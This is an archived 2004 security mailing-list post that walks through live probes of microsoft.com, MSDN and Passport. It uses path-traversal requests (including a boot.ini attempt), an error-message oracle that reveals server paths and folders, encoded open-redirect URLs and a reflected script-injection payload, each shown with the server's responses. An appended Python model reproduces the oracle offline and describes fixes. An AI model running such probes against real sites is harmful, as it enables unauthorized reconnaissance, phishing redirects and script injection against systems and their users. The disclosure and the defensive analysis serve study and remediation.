lists.openwall.net - Open Source and information security mailing list archives
Message-ID: <19549786531.20040316034710@freemail.hu>
From: vizzy at freemail.hu (Vizzy)
Subject: [Bug Proofing Microsoft.com with Internet Explorer ** Part I **]

===[Bug Proofing Microsoft.com with Internet Explorer ]===

Disclaimer: All information contained here is based on the author's wild imagination and all real coincidences are accidental. Provided for educational purposes only. Also, be aware that the Microsoft site most likely won't explode (too good to be true, see Part II), but your IE easily could.

Introduction:

So, where are we going today? All roads lead to www.microsoft.com, the powerful home of the most secure operating system. Ever. But should THE SITE be the tightest one, to demonstrate to us the powerful feeling of security and happiness? Or is it OK to have a glitch or two unless someone notices? So -- who cares? The company whose security profile is the security of their operating systems. The security of our homes (hopefully we don't all live in M$ boxes). OK, enough talking, let's see what we can phish with our handy browser..

Before we start, point your browsers to http://www.microsoft.com/isapi/gomscom.asp to remind yourself how the Microsoft site looked back in 1997, when Microsoft had no chance to hire some good web designers, because the most insecure and unstable but pretentious operating system was just about to be released..

=============[* Part I: Bogus URLs ]=================================

*********
**URL 1**
*********

Browsing MSDN I came across the following URL:

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winsock/winsock/winsock_functions.asp

The page uses frames and one of them contains "library/en-us/winsock/winsock/winsock_functions.asp". OK, let's play with the URL a bit:

http://msdn.microsoft.com/library/default.asp?url=/library/../library/en-us/winsock/winsock/winsock_functions.asp

Returns us the same page. Same result. Can we change folders?..

Trying to guess the parent folder name:

http://msdn.microsoft.com/library/default.asp?url=/library/../../msdn/library/en-us/winsock/winsock/winsock_functions.asp
> Page not found

http://msdn.microsoft.com/library/default.asp?url=/library/../../wwwroot/library/en-us/winsock/winsock/winsock_functions.asp
> Page not found

OK.. no luck.. but how about:

http://msdn.microsoft.com/library/default.asp?url=/../c:/library/en-us/winsock/winsock/winsock_functions.asp
> The system cannot find the file specified.

Hmm..

http://msdn.microsoft.com/library/default.asp?url=/../c:/boot.ini
> The system cannot find the file specified.

This looks like a Windows error message! Why? It's not here? :O I would be surprised if it was.. Tried some other default names but without luck. Let's leave this URL for now, as I found a better one:

*********
**URL 2**
*********

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=

Let's play a bit with the 'dtcfg' parameter:

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..
> msxml3.dll error '80070005'
> Access is denied.
> /library/shared/deeptree/asp/contentbar.asp, line 12

Hmm.. Interesting.

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg="
> Server.MapPath() error 'ASP 0173 : 80004005'
> Invalid Path Character
> /library/shared/deeptree/asp/contentbar.asp, line 12
> An invalid character was specified in the Path parameter for the MapPath method.

Nice. So we control the input for the Server.MapPath() function, but what is it and what does it do? Google answers: the function takes one argument, a virtual path, and returns the corresponding physical path. Right:

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=c:\
> Server.MapPath() error 'ASP 0172 : 80004005'
> Invalid Path
> /library/shared/deeptree/asp/contentbar.asp, line 12
> The Path parameter for the MapPath method must be a virtual path. A physical path was used.

Just to be sure. OK, our perspective?

It looks like we are dealing with something like:

lala.ReadXml(Server.MapPath("$dtcfg"));

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\
> msxml3.dll error '80070005'
> Access is denied.
> /library/shared/deeptree/asp/contentbar.asp, line 12

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\
> Microsoft JScript runtime error '800a138f'
> 'oXDoc.documentElement' is null or not an object
> /library/shared/deeptree/asp/contentbar.asp, line 40

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\..\
> Server.MapPath() error 'ASP 0176 : 80004005'
> Path Not Found
> /library/shared/deeptree/asp/contentbar.asp, line 12
> The Path parameter for the MapPath method did not correspond to a known path.

Looks like we are 5 levels deep from the root directory.

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml

OK, leaving it..

*********
**URL 3**
*********

http://www.microsoft.com/library/shared/searchtab/search.asp

Sneaking into the source:

<FORM id="frmSearch2" target="_top" name="frmSearch2" action="/library/shared/searchtab/searchHandoff.asp" method="get">
<INPUT TYPE="HIDDEN" name="handoffurl" value="http://search.microsoft.com/us/dev/default.asp">
<INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/library/shared/searchtab/cnfg.xml">
                                         ^^^^^^ oops!

So it looks like the great site of Microsoft is hosted on drive D:! But -- let's try to verify that.. Using one of the pages known to us from before, with an existing XML file name it is:

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/shared/searchtab/cnfg.xml

Shows us a nice sky-blue screen.

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../library/shared/searchtab/cnfg.xml

OK, browsing works..

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml

Works again! So it is indeed located in the "HTTP" parent folder. To be 100% sure, let's try a non-existent name and see what happens:

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../hxxp/library/shared/searchtab/cnfg.xml
> Microsoft JScript runtime error '800a138f'
> 'oXDoc.documentElement' is null or not an object
> /library/shared/deeptree/asp/contentbar.asp, line 40

Yeah, our assumptions were right.

/* As it appeared later, there are plenty of places where the physical path is exposed. Like:
<INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/mscorp/worldwide/spanish/msdn/cnfg.xml">
*/

Now we can use this URL to probe folders in the root web folder:

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/help/
> Microsoft JScript runtime error '800a138f'
> 'oXDoc.documentElement' is null or not an object
> /library/shared/deeptree/asp/contentbar.asp, line 40

Folder does not exist.

http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/info/
> msxml3.dll error '80070005'
> Access is denied.
> /library/shared/deeptree/asp/contentbar.asp, line 12

Folder exists.

.... etc

http://www.microsoft.com/library/shared/searchtab/searchHandoff.asp?handoffurl=http://ddd.com/ddd.asp&stcfg=default.asp&qu=123&btnSearch=GO
> strScopeId1
> sltSearchListundefined
> Microsoft JScript runtime error '800a01a8'
> Object required
> /library/shared/searchtab/searchHandoff.asp, line 90

*********
**URL 4**
*********

"Can anybody tell me where I am?" Are we at Microsoft.com or what?

http://msdn.microsoft.com/vcsharp/default.aspx?pull=%68%74%74%70%3a%2f%2f%66%75%63%6b%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d

http://help.msn.com/EN_US/external.asp?topic=%67%6f%6f%67%6c%65%2e%63%6f%6d

I thought I downloaded a security update from M$?! (R)

Now, how about securely signing up to your Passport?

https://www.passport.net/cobrand2.asp?cbru=%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d

Oh, well.. and last, but not least.. let's get some JavaScript to run on the Microsoft site:

http://www.microsoft.com/norge/news/archive.asp?y=1997%3Cscript%3Ealert('Its%20warmer%20in%20here..:)');%3C/script%3E%3C!--

*** with more critical bugs... to be continued in Part II: .......

--
have phun,
Vizzy
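The two techniques in the post, the Server.MapPath() error oracle from URL 2/URL 3 and the percent-encoded redirect targets from URL 4, as an added example that is not Vizzy's code and not Microsoft's. It models the guessed `ReadXml(Server.MapPath(dtcfg))` behaviour against a constructed, hypothetical directory tree (web root d:/http, script five levels below the drive root, exactly the layout the post infers; the folder contents are my assumption), so it runs entirely offline. The response texts are patterned on the errors quoted in the post; `map_path`, `fake_contentbar`, `classify`, `probe`, `redirect_target` and `offsite` are names introduced here.

```python
"""
Added example (not from the original post): a model of the contentbar.asp?dtcfg=
path oracle, run offline against a constructed directory tree, plus decoding of
the percent-encoded redirect parameters from URL 4.
"""
import posixpath
from urllib.parse import parse_qs, urlsplit

# Layout the post infers (assumed here): web root d:/http, script under
# /library/shared/deeptree/asp, i.e. five levels below the drive root.
WEBROOT = "d:/http"
SCRIPT_VDIR = "/library/shared/deeptree/asp"
SCRIPT = SCRIPT_VDIR + "/contentbar.asp"

# Constructed, hypothetical filesystem: physical path -> "dir" or "xml".
# Anything absent (including the bare drive "d:") is treated as not loadable,
# which reproduces the null-document error the post saw for five levels of "..".
FAKE_FS = {
    "d:/http": "dir",
    "d:/http/library": "dir",
    "d:/http/library/shared": "dir",
    "d:/http/library/shared/deeptree": "dir",
    "d:/http/library/shared/deeptree/asp": "dir",
    "d:/http/library/shared/searchtab": "dir",
    "d:/http/library/shared/searchtab/cnfg.xml": "xml",
    "d:/http/info": "dir",
}


def map_path(virtual: str) -> str:
    """Approximate Server.MapPath(): '/'-rooted paths resolve from the web root,
    relative ones from the script's folder; backslashes count as separators;
    '..' may climb up to the drive root but not past it."""
    if any(c in virtual for c in '"<>|*?'):
        raise ValueError("ASP 0173 : 80004005 Invalid Path Character")
    if len(virtual) > 1 and virtual[1] == ":":
        raise ValueError("ASP 0172 : 80004005 Invalid Path")
    v = virtual.replace("\\", "/")
    base = WEBROOT if v.startswith("/") else WEBROOT + SCRIPT_VDIR
    physical = posixpath.normpath(posixpath.join(base, v.lstrip("/")))
    if not physical.startswith(WEBROOT.split("/")[0]):  # climbed above "d:"
        raise ValueError("ASP 0176 : 80004005 Path Not Found")
    return physical


def fake_contentbar(dtcfg: str) -> str:
    """Stand-in for the real page: the body a probe would get back."""
    try:
        physical = map_path(dtcfg)
    except ValueError as err:
        return f"Server.MapPath() error '{err}'\n{SCRIPT}, line 12"
    kind = FAKE_FS.get(physical)
    if kind == "dir":
        return f"msxml3.dll error '80070005'\nAccess is denied.\n{SCRIPT}, line 12"
    if kind == "xml":
        return "<html><!-- nice sky-blue screen --></html>"
    return ("Microsoft JScript runtime error '800a138f'\n"
            f"'oXDoc.documentElement' is null or not an object\n{SCRIPT}, line 40")


# What each distinguishable response tells the prober about the path.
# "Invalid Path Character" must be tested before the shorter "Invalid Path".
VERDICTS = [
    ("Access is denied.", "exists (directory or unreadable file)"),
    ("documentElement' is null", "does not exist (or is not XML)"),
    ("Path Not Found", "outside the drive root"),
    ("Invalid Path Character", "rejected: bad character"),
    ("Invalid Path", "rejected: physical path given"),
]


def classify(body: str) -> str:
    """Turn a response body into a yes/no/outside verdict about the probed path."""
    for needle, verdict in VERDICTS:
        if needle in body:
            return verdict
    return "exists (readable XML)"


def probe(candidates, fetch=fake_contentbar):
    """Enumerate candidate paths through the oracle; `fetch` is swappable."""
    return {c: classify(fetch(c)) for c in candidates}


def redirect_target(url: str, param: str) -> str:
    """parse_qs percent-decodes, so %68%74%74%70... comes back as 'http...'."""
    return parse_qs(urlsplit(url).query).get(param, [""])[0]


def offsite(target: str, trusted=("microsoft.com", "msn.com", "passport.net")) -> bool:
    """True when a redirect parameter points off the trusted domains (host allow-list)."""
    host = urlsplit(target if "://" in target else "//" + target).hostname or ""
    return not any(host == t or host.endswith("." + t) for t in trusted)


if __name__ == "__main__":
    for p in ["..", "..\\..\\..\\", "..\\..\\..\\..\\..\\", "..\\..\\..\\..\\..\\..\\",
              "/../http/help/", "/../http/info/",
              "/library/../../http/library/shared/searchtab/cnfg.xml"]:
        print(f"{p:55} -> {classify(fake_contentbar(p))}")
    u = "https://www.passport.net/cobrand2.asp?cbru=%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d"
    t = redirect_target(u, "cbru")
    print(t, "-> offsite" if offsite(t) else "-> on-site")
```

Three things the model makes concrete: the number of `..` segments that flips the response from "Access is denied" to "Path Not Found" is the physical depth of the script below the drive root, which is how the post arrives at "5 levels deep"; "Access is denied" versus the null-document error is a reliable exists/does-not-exist oracle for directories even though no file content is ever returned; and the redirect parameters are only obscure, not protected, because the server percent-decodes them before use. On the defending side, the usual IIS fix for the first two is to disable parent paths (Server.MapPath then refuses `..` with ASP 0175 "Disallowed Path Characters") and to stop returning detailed ASP errors to remote clients; for the third, compare the decoded target's host against an allow-list as `offsite` does, rather than trusting the raw parameter.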